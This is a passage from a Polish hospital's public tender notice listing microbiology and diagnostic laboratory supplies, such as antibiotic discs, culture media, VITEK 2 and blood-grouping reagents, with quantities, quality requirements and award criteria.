13	Cefotaksym 5 ?g	1szt.	1000
14	Cefotaksym 30 ?g	1szt.	1500
15	Cefoksytyna 30 ?g	1szt.	800
16	Ceftazydym 10 ?g	1szt.	1000
17	Ceftazydym 30 ?g	1szt.	1500
18	Ceftriakson 30 ?g	1szt.	100
19	Cefuroksym 30 ?g	1szt.	1000
20	Chinupristyna/Dalfapristyna 15 ?g	1szt.	150
21	Chloramfnicol 30 ?g	1szt.	300
22	Ciprofloksacyna 5 ?g	1szt.	1500
23	Doksycyklina 30 ?g	1szt.	50
24	Doripenem 10 ?g	1szt.	300
25	Ertapenem 10 ?g	1szt.	300
26	Erytromycyna 15 ?g	1szt.	600
27	Furazolidon 100	1szt.	50
28	Gentamycyna 10 ?g	1szt.	1800
29	Gentamycyna 30 ?g	1szt.	300
30	Imipenem 10 ?g	1szt.	1000
31	Klarytromycyna 15 ?g	1szt.	50
32	Klindamycyna 2 ?g	1szt.	500
33	Kolistyna 50 ?g	1szt.	50
34	Kwas nalidyksowy 30 ?g	1szt.	50
35	Lewofloksacyna 5 ?g	1szt.	50
36	Linezolid 10 ?g	1szt.	100
37	Meropenem 10 ?g	1szt.	800
38	Netilmycyna 10 ?g	1szt.	1000
39	Nitrofurantoina 100 ?g	1szt.	600
40	Norfloksacyna 10 ?g	1szt.	400
41	Ofloksacyna 5 ?g	1szt.	100
42	Oksacylina 1 ?g	1szt.	100
43	Pefloksacyna  5 ?g	1szt.	50
44	Penicylina benzylowa (penicylina G) 1UI	1szt.	400
45	Piperacylina 30 ?g	1szt.	300
46	Piperacylina/tazobactam (30/6)  36 ?g	1szt.	500
47	Rifampicyna 5 ?g	1szt.	150
48	Streptomycyna 300 ?g	1szt.	100
49	Teikoplanina 30 ?g	1szt.	500
50	Tetracyklina 30 ug	1szt.	300
51	Tigecyklina 15 ?g	1szt.	100
52	Tikarcylina 75 ?g	1szt.	100
53	Tikarcylina/kwas klawulanowy (75/10)  85 ?g	1szt.	500
54	Tobramycyna 10 ?g	1szt.	1000
55	Trimetoprim 5 ?g	1szt.	50
56	Trimetoprim/Sulfametoksazol (1,25/23,75)  25 ?g	1szt.	1800
57	Temocylina	1szt.	100
58	Wankomycyna 5 ?g	1szt.	500
59	Puste krążki bibułowe nie nasączone antybiotykiem	1szt.	150
Krążki i testy diagnostyczne			
60	Krążki diagnostyczne z optochiną do różnicowania Streptococcus pneumoniae.	1szt.	800
61	Krążki diagnostyczne z czynnikami X iV do różnicowania pałeczek z rodzaju Haemophilus.	1szt.	300
62	Krążki diagnostyczne z czynnikami X do  różnicowania pałeczek z rodzaju Haemophilus	1szt.	300
63	Krążki diagnostyczne z czynnikami V do  różnicowania pałeczek z rodzaju Haemophilus	1szt.	300
64	Błękit metylenowy Loefflera (opakowanie 50 ampułek)	1op.	3
65	Dezoksycholan sodu 10% r-r, op. 50 ampułek	1op.	1
66	Krążki diagnostyczne do różnicowania bakterii z rodzaju Moraxella od Neisseria	1szt.	100
67	Test do wykrywania pyrazy dla enterokoków	1op.	3
68	Krążki do różnicowania szczepów E. faecalis i E. faecium	1szt.	200
69	Cefinaza   -   b-laktamaza	1szt.	100
70	Krązki do różnicowania Streptococcus grupy A - bacytracyna	1szt.	50
71	 Test na oksydazę  cytochromową	1szt.	300
72	Ceftazydym/Kw. klawulanowy (ESBL)	1szt.	100
73	Cefotaksym/Kw. klawulanowy (ESBL)	1szt.	100
Krążki z antybiotykami:											
1.  Krążki antybiotykowe pochodzące od jednego producenta. Każda fiolka z krążkami powinna być zapakowana w oddzielne, hermetycznie zamknięte opakowanie typu blister.											
2. Każda fiolka musi posiadać w swoim zewnętrznym opakowaniu indywidualny pochłaniacz wilgoci (środek higroskopijny), zabezpieczający każdą fiolkę przed zawilgoceniem.											
3. Na każdym pojedyńczym krążku musi widnieć wyraźnie nadrukowany symbol i stężenie antybiotyku w ?g (wydrukowane dwusronnie) zgodnie z zaleceniami CLSI/EUCAST.											
4. Każda fiolka musi posiadać etykietę z nazwą antybiotyku, jego stężeniem, datą ważności i numerem serii.											
5. Identyczna temperatura przechowywania dla wszystkich krążków od -20oC do  + 8oC do oferty załączyć próbki po 1 fiolce imipenem i meropenem.											
6. Stężenie antybiotyku na krążku musi zawierać się w zakresie 90-125% ustalonego stężenia. Przy pierwszej dostawie należy dostarczyć pismo producenta krążków antybiotykowych odnośnie zakresu stężenia antybiotyku zawartego na krążkach.											
7. Należy dołączyć próbki produktu, tj. fiolki z antybiotykami dla poz. 19, 30, 37											
8. Do każdej dostawy musi być dołączony certyfikat  kontroli jakości, który  powinien zawierać: nazwę  producenta, nazwę antybiotyku, stężenie, numer serii, datę ważności.											
kontrolę stężenia antybiotyku na krążku											
kontrolę na szczepach wzorcowych wraz ze strefami											
9. Fiolki z krążkami muszą być zgodne z wytycznymi producenta zawartymi w instrukcji dyspensera.											
10. Do oferty należy dołączyć pozytywną opinię Krajowego Ośrodka Referencyjnego ds. Lekowrażliwości Drobnoustrojów, certyfikat ISO 13485 i ISO 9001, certyfikaty analizy, karty charakterystyki substancji niebezpiecznej.											
W przypadku podpisania umowy dostawy krążków,  wykonawca zapewni bezpłatne użyczenie na czas trwania umowy  4 dyspenserów pasujących do krążków.											
											
Krążki diagnostyczne do różnicowania drobnoustrojów:											
pakowane w fiolki po 25 lub 50 sztuk											
											
Termin ważności: min. 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mikrobiologiczne odczynniki diagnostyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Gotowe podłoża na płytkach Petriego 90mm				
1	Columbia Agar z 5% krwią baranią	1szt.	3000	
2	Columbia CNA  Agar z 5% krwią baranią	1szt.	550	
3	Mac Conkey Agar	1szt.	3000	
4	Mannitol Salt Agar (Chapman)	1szt.	800	
5	Mueller Hinton Agar z 5% krwią końską  + 20% NAD	1szt.	400	
6	Mueller Hinton Agar z 5% krwią baranią	1szt.	100	
7	Mueller Hinton Agar 	1szt.	4000	
8	Schaedler Agar z 5% krwią baranią	1szt.	300	
9	Sabouraud z Gentamicyną i Chloramfenikolem	1szt.	800	
10	Salmonella Shigella Agar	1szt.	800	
11	Chocolate Haemophilus Agar z Polyviteksem i Bacitracyną	1szt.	400	
12	Podłoże różnicujące dla enterokoków z żółcią i eskuliną	1szt.	250	
Pożywki gotowe w probówkach				
13	Bulion tryptozowo-sojowy do izolacji bakterii o niewysokich wymaganiach odżywczych	1szt.	500	
14	Podłoże do namnażania Salmonella w próbkach kału	1szt.	200	
15	Scheadler bulion + hemina, witamina K - 9ml,	1szt.	100	
Testy do identyfikacji i oznaczania lekooporności - odczyt wizualny				
16	Test do oznaczania lekooporności drożdżaków chorobotwórczych do odczytu wizualnego	1szt.	200	
17	Testy do identyfikacji pałeczki z rodzaju Enterobacteriaceae o minimum 18 cechach biochemicznych wraz z odczynnikami i programem komputerowym do odczytu kodów	1szt.	300	
18	Testy do identyfikacji Staphylococcus o minimum 18 cechach biochemicznych wraz z odczynnikami i programem komputerowym do odczytu kodów	1szt.	100	
19	Testy do oznaczania lekooporności dla bakterii beztlenowych.	1szt.	120	
20	Roztwór do przygotowania zawiesiny bakteryjnej (NaCL 0,85%)	1 szt	200	
Paski przeznaczone do okreslenia wartości MIC dla leków przeciwbakteryjnych				
21	Paski zawierające gradient stężeń antybiotyku Benzylopenicylina  przeznaczone do oznaczania wartości MIC	1szt.	60	
22	Paski zawierające gradient stężeń antybiotyku Ampicylina przeznaczone do oznaczania wartości MIC	1szt.	30	
23	Paski zawierające gradient stężeń antybiotyku Amoksycylina/kw.klawulanowy przeznaczone do oznaczania wartości MIC	1szt.	30	
24	Paski zawierające gradient stężeń antybiotyku Ampicylina/sulbaktam przeznaczone do oznaczania wartości MIC	1szt.	30	
25	Paski zawierające gradient stężeń antybiotyku Cefuroksym przeznaczone do oznaczania wartości MIC	1szt.	60	
26	Paski zawierające gradient stężeń antybiotyku Cefotaksym przeznaczone do oznaczania wartości MIC	1szt.	60	
27	Paski zawierające gradient stężeń antybiotyku Ceftazydym przeznaczone do oznaczania wartości MIC	1szt.	60	
28	Paski zawierające gradient stężeń antybiotyku Cefepim przeznaczone do oznaczania wartości MIC	1szt.	60	
29	Paski zawierające gradient stężeń antybiotyku Ceftriakson przeznaczone do oznaczania wartości MIC	1szt.	30	
30	Paski zawierające gradient stężeń antybiotyku Amikacyna przeznaczone do oznaczania wartości MIC	1szt.	60	
31	Paski zawierające gradient stężeń antybiotyku Gentamicyna przeznaczone do oznaczania wartości MIC	1szt.	30	
32	Paski zawierające gradient stężeń antybiotyku Ciprofloksacyna przeznaczone do oznaczania wartości MIC	1szt.	30	
33	Paski zawierające gradient stężeń antybiotyku Imipenem  przeznaczone do oznaczania wartości MIC	1szt.	30	
34	Paski zawierające gradient stężeń antybiotyku Meropenem  przeznaczone do oznaczania wartości MIC	1szt.	30	
35	Paski zawierające gradient stężeń antybiotyku Ertapenem przeznaczone do oznaczania wartości MIC	1szt.	30	
36	Paski zawierające gradient stężeń antybiotyku Kolistyna przeznaczone do oznaczania wartości MIC	1szt.	30	
37	Paski zawierające gradient stężeń antybiotyku Lewofloksacyna przeznaczone do oznaczania wartości MIC	1szt.	30	
38	Paski zawierające gradient stężeń antybiotyku Linezolid przeznaczone do oznaczania wartości MIC	1szt.	30	
39	Paski zawierające gradient stężeń antybiotyku Trimetoprim/sulfametoksazol przeznaczone do oznaczania wartości MIC	1szt.	30	
40	Paski zawierające gradient stężeń antybiotyku Teikoplanina  przeznaczone do oznaczania wartości MIC	1szt.	30	
41	Paski zawierające gradient stężeń antybiotyku Wankomycyna  przeznaczone do oznaczania wartości MIC	1szt.	30	
Paski przeznaczone do wykrywania mechanizmów oporności pakowane w blistrach				
42	Paski zawierające gradient stężeń antybiotyków do wykrywania mechanizmu oporności MBL	1szt.	60	
43	Paski zawierające gradient stężeń antybiotyków do wykrywania mechanizmu oporności ESBL	1szt.	30	
Podłoża transportowo - wzrostowe do posiewu moczu				
44	Gotowe podłoża do posiewu moczu typu CLED/MacConkey	1szt.	800	
Barwienie metodą Gramma				
45	Fiolet Krystaliczny   	1L.	2	
46	Safranina 	1L.	2	
47	Odczynnik Lugola  	1L.	2	
48	Odbarwiacz  	1L.	2	
Systemy do hodowli				
49	Zestaw torebka+generator do hodowli w warunkach beztlenowych (min. 10 torebek)	1op.	30	
50	Zestaw torebka+generator do hodowli w warunkach mikroaerofilnych (min. 10 torebek)	1op.	10	
51	Saszetki zawierające generator C02 (min. 10 torebek)	1op.	5
1. Podloża w pakiecie muszą pochodzić od jednego producenta.                                                                                                                                        
2. Podłoża nie mogą zmieniać barwy po inkubacji zalecanej dla hodowli drobnoustrojów, w warunkach Zamawiającego.											
3. Wymaga się aby oferowane produkty posiadały certyfikat ISO 13485:2003 -certyfikaty jakości w języku polskim  - podłoża na płytkach oraz certyfikat ISO 9001 na produkcję podłoży gotowych na płytkach, probówkach  oraz testów.											
4. Zamawiający wymaga zachowania należytej  jakości podłoży przez cały oferowany okres obowiązywania terminu ważności oferowanych produktów. Nadruk na każdej  płytce musi być czytelny, napisy dużymi literami i  cyframi. Nadruk  ma  zawierać nazwę podłoża, numer serii, datę ważności  oraz  nazwę producenta. 
Opisy maja znajdować się na wierzchniej stronie płytek  / nie dopuszcza się umieszczenia ww opisów na bocznych krawędziach płytek/ 										
5. Należy dostarczyć certyfikat kontroli jakości do każdej serii podłoży na płytkach i w probówkach oraz testów. Do oferty dołączyć przykładowe certyfikaty dla poszczególnych produktów.											
6. Płytki muszą być opakowane w folię oraz karton (zbiorczy)  w celu zabezpieczenia przed uszkodzeniami mechanicznymi oraz przed dostępem światła słonecznego, na kartonie musi być nadruk z nr katalogowym, nazwą podłoża, nr serii. 											
7. Wymaga się aby probówki były z tworzywa o dobrej przejrzystości - by nie utrudniały odczytu zmętnienia bulionu (dot. poz. 13-15).											
8. Paski do gradientowego odczytu MIC powinny być wykonane z materiału plastikowego, pakowane pojedyńczo, w blistrach.  Należy dostarczyć do oferty pozytywną opinię Krajowego Ośrodka ds. Lekowrażliwości dla produktu.											
											
Wykonawca zapewni na czas trwania umowy chłodziarko - zamrażarkę o wymiarach (szer. 60 cm i wysokości min. 180cm)  w celu zapewnienia prawidlowej temperatury odczynników mikrobiologicznych											
											
Terminy ważności:											
1. Podłoża na płytkach zawierajace krew minimum 4-5 tygodni											
2. Podłoża na płytkach bez krwi minimum 4-8 tygodni											
3. Pozostałe odczynniki minimum 6 miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Odczynniki mikrobiologiczne do hodowli, różnicowania oraz  identyfikacji drobnoustrojów i mechanizmów oporności na antybiotyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podłoża chromogenne do hodowli i  identyfikacji na płytkach Petriego 90mm 			
1	Podłoże chromogenne do identyfikacji grzybów z rodzaju Candida	1szt.	80
2	Podłoże chromogenne do badań przesiewowych szczepów Enterococcus wykazujących oporność nabytą na wankomycynę (VRE)	1szt.	60
3	Podłoże chromogenne do wybiórczej izolacji szczepów z rodziny Enterobacteriacae wytwarzających ESBL	1szt.	80
4	Podłoże chromogenne do identyfikacji Streptococcus agalactiae	1szt.	180
5	Podłoże chromogenne do identyfikacji laktozododatnich pałeczek Salmonella spp	1szt.	240
6	Do ilościowego i jakościowego oznaczania bakterii w moczu 	1szt.	400
7	Podłoże chromogenne KPC do wykrywania oporności na karbapenemy 	1szt.	40
8	Podłoże chromogenne do szybkiej identyfikacji szczepów metycylinoopornych MRSA	1szt.	60
Podłoża do wybiórczego wykrywania na płytkach Petriego 90mm			
9	Podłoze do izolacji Clostridium difficile	1szt.	60
10	Podłoze do izolacji Campylobacter spp	1szt.	100
11	Podłoze do izolacji Yersinia spp	1szt.	100
Testy do szybkiej identyfikacji			
12	Test lateksowy do wykrywania antygenów grupowych dla paciorkowców grupy A,B,C,D,F i G 	1op.	4
13	Test lateksowy do wykrywania antygenów Streptococcus agalactiae	1op.	2
14	Test lateksowy barwny do wykrywania białka A i CF u gronkowców z polami reakcyjnymi	1op.	18
15	Test immunochromatograficzny do wykrywania antygennów Rota i Adenowirusów w kale	1op.	18
16	Test immunochromatograficzny do oznaczenia antygenu Norowirusa w kale, kasetki	1op.	2
17	Test lateksowy do wykrywania antygenów  w płynie mózgowo-rdzeniowym i innych płynach ustrojowych min. 30 oznaczeń	1op.	2
18	Test do identyfikacji Salmonella spp z hodowli 	1op.	1
Wykrywanie mechanizmów oporności na antybiotyki			
19	Mueller Hinton Agar z kloksacyliną 	1szt.	40
20	Test do wykrywania karbapenemaz u Enterobacteriacae, Pseudomonas spp., Acinetobacter spp.	1op.	40
21	Roztwór do przygotowania zawiesiny bakteryjnej (naCl 0,85%)	1szt.	200
22	inhibitor EDTA 0,5 M - probówka (wykrywanie mechanizmu MBL)	1szt.	3
23	inhibitor  kwas fenyloboranowy - probówka (wykrywanie mechanizmu KPC)	1szt.	3
Inne			
24	Probówki do długotrwałego przechowywania mikroorganizmów w temp. min. -20oC (z parowatymi granulkami i bulionem) Różne kolory pozwalają na łatwą identyfikacje szczepów.	1szt.	160

1. Zamawiający wymaga złożenia próbek w ilości po 5 szt. w celu umożliwienia dokonania oceny zgodności zaproponowanych asortymentów z opisem przedmiotu zamówienia dla pozycji 1, 5, 6, 7, 10, 11.											
2. Dodatkowe wymagania dla pozycji nr 6: podłoże chromogenne nietransparentne wykrywające B-glukozydazę, B-galaktozydazę, dezaminację tryptofanu, podłoże z dodatkiem surowicy końskiej,  do oferty załączyć kolorowa ulotkę obrazującą wzrost następujacych mikroorganizmów: S. marcescens, E. faecalis, E. faecium, S. aureus, P. mirabillis, P. vulgaris, S. agalactiae,  M. morganii,  S. saprophyticus,  P. aeruginosa											
3. Do oferty dołączyć kolorowe ulotki wzrostu kolinii dla podłóż w pozycjach 1-10											
4. Wszystkie podłoża (poz. 1-11) w celu standaryzacji badań muszą pochodzić od jednego producenta																					
Terminy ważności:											
1. Podłoża na płytkach zawierające krew minimum 4-5 tygodni											
2. Podłoża na płytkach bez krwi minimum 4-8 tygodni											
3. Pozostałe odczynniki minimum 6 miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Odczynniki do aparatów: VITEK 2 compact,  BacT/ALERT oraz  PREVI Color Gram wraz z przeglądami okresowymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Testy identyfikacyjne i antybiogramowe do systemu VITEK 2 compact			
1	Test identyfikacyjny dla bakterii Gram ujemnych VITEK 2 GN (20 kart)	1op.	25
2	Test identyfikacyjny dla bakterii Gram dodatnich VITEK 2 GP (20 kart)	1op.	18
3	Test identyfikacyjny dla drożdzaków VITEK 2 YST (20 kart)	1op.	3
4	Test identyfikacyjny dla Neisseria, Haemophilus VITEK 2 NH (20 kart)	1op.	4
5	Test identyfikacyjny dla beztlenowców i Corynebacterium VITEK 2 ANC (20 kart)	1op.	3
6	Test lekowrażliwości dla bakteri Gram dodatnich VITEK 2 AST- P (20 kart);  Podać wszystkie dostępne numery kart	1op.	8
7	Test lekowrażliwości dla bakteri Gram ujemnych VITEK 2 AST- N   (20 kart); Podać wszystkie dostępne numery kart	1op.	10
8	Test lekowrażliwości dla drożdżaków  VITEK 2 AST - YS01 (20 kart)	1op.	2
Odczynniki dodatkowe do VITEK 2 Compact			
9	Roztwór do przygotowania zawiesiny (0,45 % 3 x 500ml)	1op.	4
10	Koncówki do pipet 100-1000?l	1op.	2
11	Koncówki do pipet 0,5-250?l	1op.	2
12	Standard do kalibracji densytometru 	1op.	1
13	Probówki 1x 2000szt.	1op.	1
14	12 MONTH PM KIT	1op.	1
15	BELT, TIMING, 3 HTD, 197 GR	1op.	1
16	Baterie UPS	1op.	1
Podłoża hodowlane do posiewu krwi i innych płynów ustrojowych w systemie BacT/ALERT			
17	Podłoża do hodowli bakterii i grzybów w warunkach tlenowych z krwi i płynów ustrojowych od pacjentów w trakcie antybiotykoterapii (FA) 	1op.	2
18	Podłoża do hodowli bakterii i grzybów w warunkach beztlenowych z krwi i płynów ustrojowych od pacjentów  w trakcie antybiotykoterapii (FN)	1op.	2
19	Podłoża pediatryczne do hodowli drobnoustrojów z krwi (PF)	1op.	2
Odczynniki  PREVI Color Gram wykorzystywane do barwienia drobnoustrojów metodą Grama			
20	FUCHSIN-A	1op.	2
21	IODINE-B	1op.	2
22	CRYSTAL VIOLET-C	1op.	2
Przeglądy aparatów			
23	VITEK 2 Compact	1	1
24	BacT/ALERT	1	1
W celu zapewnienia prawidlowej temperatury do  pracy analizatorów Wykonawca dostarczy na czas trwania umowy urzadzenie klimatyzacyjne wraz z okresowymi przegladami technicznymi.	
Termin ważności: odczynniki do aparatów min. 6 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sprzęt laboratoryjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pojemniki z przejrzystego polipropylenu o poj. 40-60 ml z zakrętką, sterylne, pakowane indywidualnie	1szt.	1500
2	Pojemnik z przejrzystego polipropylenu na kał, z zakrętką, i łopatką, poj. 25 ml, sterylny, pakowane indywidualnie	1szt.	500
3	Probówki z polipropylenu o poj. 10 ml, przezroczyste 16x100 mm z podziałką, okrągłodenne z korkiem, sterylne	1szt.	500
4	Probówki z polistyrenu min.wys. 100mm z zakrętką, sterylne, pakowane indywidualnie 	1szt.	500
5	Pipety Pasteura PE o poj. 3 ml, z podziałką, sterylne, pakowane indywidualnie	1szt.	1500
6	Wymazówki sterylne z aplikatorem drewnianym pakowane indywidualnie	1szt.	10000
7	Wymazówki transportowe z podłożem AMIE; sterylna	1szt.	2000
8	Ezy z oczkiem 1ul, pakowane, indywidualnie,sterylne	1szt.	1500
9	Ezy z oczkiem 10ul, pakowane indywidualnie,sterylne	1szt.	2000
10	Końcówki żółte 5-200 ul, typ Eppendorf, sterylne, pakowane po 5 szt.	1szt.	1000
11	Końcówki niebieskie 100-1000 ul, typ Eppendorf, sterylne, pakowane po 5 szt.	1szt.	1000
Termin ważności: min. 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Testy do diagnostyki laboratoryjnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Test płytkowy (kasetkowy) do równoczesnego wykrywania toksyn A/B Clostridium difficile oraz dehydrogenazy glutaminianowej (GDH) oraz akcesoria i probówki potrzebne do wykonania oznaczenia. Koniugat - przeciwciała przeciwko toksynom A/B oraz GDH. Wykrywalność toksyny A - min. 0,7ng /ml. 
Wykrywalność toksyny B - min. 0,2 ng/ml.
Wykrywalność GDH - min. 0,8 ng/ml.
Kontrola dodatnia (antygen) zawarta w zestawie.	1op.	6
Termin ważności: min. 6 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa odczynników i artykułów do diagnostyki medycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	WR - RPR	3000	6
2	Amfetamina test	130	13
3	Ekstaza test	130	13
4	Kokaina test	130	13
5	Morfina test	130	13
6	THC test	130	13
7	Giardia lamblia	400	20
8	Krew utajona	800	40
9	Helicobacter pylor w kale	70	3
10	Helicobacter pylor w krwi (przeciwciała IgG)	130	4
11	Waaler Rose	150	2
12	Mononukleoza	100	2
13	EBV IgM	20	2
14	EBV IgG	20	2
15	Odczynnik Nonne - Apelta	200ml	2
16	Odczynnik Pandyego	200ml	2
17	Odczynnik Giemsy	5000ml	5
18	Odczynnik May-Grunwalda	5000ml	5
19	Odczynnik Extona	10000ml	10
20	Odczynnik McWilliama	20000ml	20
21	anty-A klon I	600ml	60
22	anty-A klon II	600ml	60
23	anty-B I	600ml	60
24	anty-B II	600ml	60
25	anty-D Blend	600ml	60
26	anty-D Rum	600ml	60
27	anty-D standard	40ml	20
28	Dolichotest	20ml	10
29	Surowica antyglobulinowa poliwalentna	50ml	10
30	Surowica grupy AB	10ml	2
31	Jednorazowe płyty do oznaczeń serologicznych 6	2000szt	20
32	Tuberqulosis (przeciwciała IgG, IgM, IgA )	40	2
33	Kwas solny 1N	2000ml	2
Dotyczy pozycji 15-20: odczynniki gotowe do użycia.							
Termin ważności: min. 6 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa odczynników, systemu kontroli do posiadanego aparatu SYSMEX XS-1000i wraz z dzierżawą analizatora beckup 5 DIFF do badań hematologicznych i okresowymi przeglądami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cellpack	litr	92
2	Sulfolyser	litr	18
4	Stromatolyser-4DL	litr	50
5	Cellclean	ml	6
6	Stromatolyser-4DS	ml	26
7	e-Check-H	ml	7
8	e-Check-N	ml	7
9	e-Check-L	ml	7
10	przegląd aparatu (własność SP ZOZ)	szt	1
Czynsz dzierżawy 			
UWAGA!!!											
Dodatkowe: Zapewnienie optymalnej temperatury pracy analizatorów przez dostarczenie urządzenia klimatyzacyjnego na powierzchnię około 20 m2 wraz z koniecznymi przeglądami.		
Terminy ważności:											
1. Odczynniki min. 6 miesięcy											
2. Kontrole min. 6 tygodni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa odczynników do posiadanego sprzętu firmy DiaMed.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa krwi				
1	Pełne oznaczenie grupy krwi z badaniem izoaglutynin grupowych (A-B-DVI--ctl/A1-B)	90	2	4x12 kart
2	Grupa krwi z BTA (A-B, AB DVI+,ctl/BTA) Podać nazwy klonów	550	2	24x12 kart
3	Potwierdzenie grupy Krwi (A-B-DVI-) Inne klony niż w pkt 2 Podać nazwy klonów.	90	2	4x12 kart
Screening Przeciwciał				
4	Karta do screeningu przeciwciał na 3 krw. wzorcowych w PTA LISS 	5500	4	60x12 kart
Próba zgodności				
5	Właściwa próba krzyżowa PTA LISS: (liczba donacji)	1700	1	24x12 kart
Krwinki wzorcowe				
6	Zestaw 3 krwinek wzorcowych do screeningu p/c (do testu PTA LISS ) 	adekwatnie	28	3x10 ml
Materiały zużywalne potrzebne do wykonania ww. ilości badań (liczone w opakowaniach)				
7	Odczynnik LISS		4	1x500 ml
8	Końcówki do pipety		10	1x1000 szt.
Badania dodatkowe				
9	Kontrola Zewnętrzna Międzynarodowa 	4 op.	4	4 kplt
10	Doposażenie: Dzierżawa sprzetu do pracowni serologii transfuzjologicznej, w postaci: elektronicznej Pipety dedykowanej dedykowanej do systemu, Dozownika Diluentu - 2 szt                           		12	1 kplt
11	Coroczna, obowiązkowa walidacja sprzętu na pracowni serologii Transfuzjologicznej (własność SP ZOZ)		1	1 kplt
PARAMETRY GRANICZNE											
1. Odczynniki zgodne z instrukcjami obsługi posiadanego przez Zamawiającego sprzętu (ID-System) zgodnie z art. 90 ust. O WM 											
2. W przypadku oferowania odczynników alternatywnych dołączyć oświadczenie producenta sprzętu lub IHiT Warszawa o możliwości stosowania oferowanych kart i odczynników na sprzęcie Zamawiającego ID-System Diamed.											
3. Wszystkie odczynniki i kontrola międzynarodowa od jednego producenta											
4. Mikrokarty do testu PTA powinny być wypełnione surowicą antyglobulinową poliwalentną											
5. Krwinki wzorcowe do badania przeciwciał odpornościowych z panelem 3 krwinkowym zawierającym antygen Cw  muszą być gotowe do użycia 											
6. Wymagana jest metodyka eliminująca płukanie krwinek czerwonych, zawiesina krwinek poniżej 1% 											
7. Mikrokarty muszą składać się z 6 kolumn wypełnionych żelowym podłożem separującym.											
8. Mikrokarty do grup krwi noworodka  I-sza seria  (A-B-AB-DV+-ctl/BTA) i druga seria (A-B-DV-) Podać nazwy klonów dla obydwu serii. Wymagane są inne klony w obu seriach.											
9. Wykonawca zapewni autoryzowany serwis i walidację urządzeń.											
10. Dla pozycji 1, 2, 3 Wykonawca dostarczy wraz z ofertą próbki po 2 karty dla każdej pozycji.	
Terminy ważności:											
